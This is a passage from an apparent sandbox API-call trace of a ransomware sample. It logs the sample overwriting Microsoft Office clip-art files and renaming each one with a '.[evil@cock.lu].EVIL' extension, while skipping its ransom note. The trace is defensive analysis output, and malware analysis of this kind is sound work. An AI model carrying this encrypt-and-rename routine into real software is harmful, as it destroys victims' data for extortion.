dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.696] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x4fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4fe0, lpOverlapped=0x0) returned 1 [0138.696] CloseHandle (hObject=0x1a8) returned 1 [0138.696] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.697] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.697] __uncaught_exception () returned 0x84b1160800 [0138.697] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.697] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf.[evil@cock.lu].evil")) returned 1 [0138.698] ??_V@YAXPEAX@Z () returned 0x1 [0138.701] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF", dwFileAttributes=0x200) returned 0 [0138.701] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.701] wcsstr (_Str="J0105412.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.701] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 69 [0138.701] wcscmp (_String1="J0105412.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.701] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105412.WMF") returned 0x0 [0138.701] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF") returned 0x45 [0138.701] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.703] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x24b8, lpOverlapped=0x0) returned 1 [0138.729] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.729] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.729] _errno () returned 0x84b1160840 [0138.729] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.729] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x24c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x24c0, lpOverlapped=0x0) returned 1 [0138.729] CloseHandle (hObject=0x1a8) returned 1 [0138.729] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.730] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.730] __uncaught_exception () returned 0x84b1160800 [0138.730] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.730] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105412.wmf.[evil@cock.lu].evil")) returned 1 [0138.731] ??_V@YAXPEAX@Z () returned 0x1 [0138.733] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105412.WMF", dwFileAttributes=0x200) returned 0 [0138.734] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.734] wcsstr (_Str="J0105414.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.734] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 69 [0138.734] wcscmp (_String1="J0105414.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.734] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105414.WMF") returned 0x0 [0138.734] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF") returned 0x45 [0138.734] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.756] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1864, lpOverlapped=0x0) returned 1 [0138.774] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.774] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.774] _errno () returned 0x84b1160840 [0138.774] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.774] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1880, lpOverlapped=0x0) returned 1 [0138.774] CloseHandle (hObject=0x1a8) returned 1 [0138.774] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.775] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.775] __uncaught_exception () returned 0x84b1160800 [0138.775] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.775] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105414.wmf.[evil@cock.lu].evil")) returned 1 [0138.776] ??_V@YAXPEAX@Z () returned 0x1 [0138.778] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105414.WMF", dwFileAttributes=0x200) returned 0 [0138.779] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.779] wcsstr (_Str="J0105490.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.779] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 69 [0138.779] wcscmp (_String1="J0105490.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.779] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105490.WMF") returned 0x0 [0138.779] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF") returned 0x45 [0138.779] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.785] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4928, lpOverlapped=0x0) returned 1 [0138.824] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.824] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.824] _errno () returned 0x84b1160840 [0138.824] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.824] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4940, lpOverlapped=0x0) returned 1 [0138.824] CloseHandle (hObject=0x1a8) returned 1 [0138.825] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.825] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.825] __uncaught_exception () returned 0x84b1160800 [0138.825] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.825] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105490.wmf.[evil@cock.lu].evil")) returned 1 [0138.826] ??_V@YAXPEAX@Z () returned 0x1 [0138.828] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105490.WMF", dwFileAttributes=0x200) returned 0 [0138.829] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.829] wcsstr (_Str="J0105496.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.829] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 69 [0138.829] wcscmp (_String1="J0105496.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.829] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105496.WMF") returned 0x0 [0138.829] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF") returned 0x45 [0138.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.830] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1424, lpOverlapped=0x0) returned 1 [0138.871] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.871] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.871] _errno () returned 0x84b1160840 [0138.871] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.871] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1440, lpOverlapped=0x0) returned 1 [0138.871] CloseHandle (hObject=0x1a8) returned 1 [0138.872] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.872] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.872] __uncaught_exception () returned 0x84b1160800 [0138.872] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.872] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105496.wmf.[evil@cock.lu].evil")) returned 1 [0138.873] ??_V@YAXPEAX@Z () returned 0x1 [0138.875] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105496.WMF", dwFileAttributes=0x200) returned 0 [0138.876] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.876] wcsstr (_Str="J0105502.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.876] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 69 [0138.876] wcscmp (_String1="J0105502.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.876] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105502.WMF") returned 0x0 [0138.876] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 0x45 [0138.876] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.877] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1560, lpOverlapped=0x0) returned 1 [0138.897] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.897] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.897] _errno () returned 0x84b1160840 [0138.897] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.897] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1580, lpOverlapped=0x0) returned 1 [0138.897] CloseHandle (hObject=0x1a8) returned 1 [0138.898] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.898] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.898] __uncaught_exception () returned 0x84b1160800 [0138.898] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.898] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf.[evil@cock.lu].evil")) returned 1 [0138.899] ??_V@YAXPEAX@Z () returned 0x1 [0138.901] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF", dwFileAttributes=0x200) returned 0 [0138.902] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.902] wcsstr (_Str="J0105504.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.902] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 69 [0138.902] wcscmp (_String1="J0105504.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.902] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105504.WMF") returned 0x0 [0138.902] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 0x45 [0138.902] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.904] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1034, lpOverlapped=0x0) returned 1 [0138.937] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.937] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.937] _errno () returned 0x84b1160840 [0138.937] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.938] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1040, lpOverlapped=0x0) returned 1 [0138.938] CloseHandle (hObject=0x1a8) returned 1 [0138.938] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.938] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.938] __uncaught_exception () returned 0x84b1160800 [0138.938] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.938] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf.[evil@cock.lu].evil")) returned 1 [0138.939] ??_V@YAXPEAX@Z () returned 0x1 [0138.942] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF", dwFileAttributes=0x200) returned 0 [0138.942] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.942] wcsstr (_Str="J0105506.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.942] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 69 [0138.942] wcscmp (_String1="J0105506.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.942] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105506.WMF") returned 0x0 [0138.942] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 0x45 [0138.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.944] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xb60, lpOverlapped=0x0) returned 1 [0138.988] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.988] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.988] _errno () returned 0x84b1160840 [0138.988] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.988] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xb80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb80, lpOverlapped=0x0) returned 1 [0138.988] CloseHandle (hObject=0x1a8) returned 1 [0138.989] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.989] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.989] __uncaught_exception () returned 0x84b1160800 [0138.989] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.989] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf.[evil@cock.lu].evil")) returned 1 [0138.990] ??_V@YAXPEAX@Z () returned 0x1 [0138.992] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF", dwFileAttributes=0x200) returned 0 [0138.993] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.993] wcsstr (_Str="J0105520.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.993] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 69 [0138.993] wcscmp (_String1="J0105520.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.993] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105520.WMF") returned 0x0 [0138.993] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF") returned 0x45 [0138.993] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105520.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.994] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7c44, lpOverlapped=0x0) returned 1 [0139.054] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.054] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0139.054] _errno () returned 0x84b1160840 [0139.054] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.054] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c60, lpOverlapped=0x0) returned 1 [0139.054] CloseHandle (hObject=0x1a8) returned 1 [0139.054] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105520.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0139.054] fputc (in: 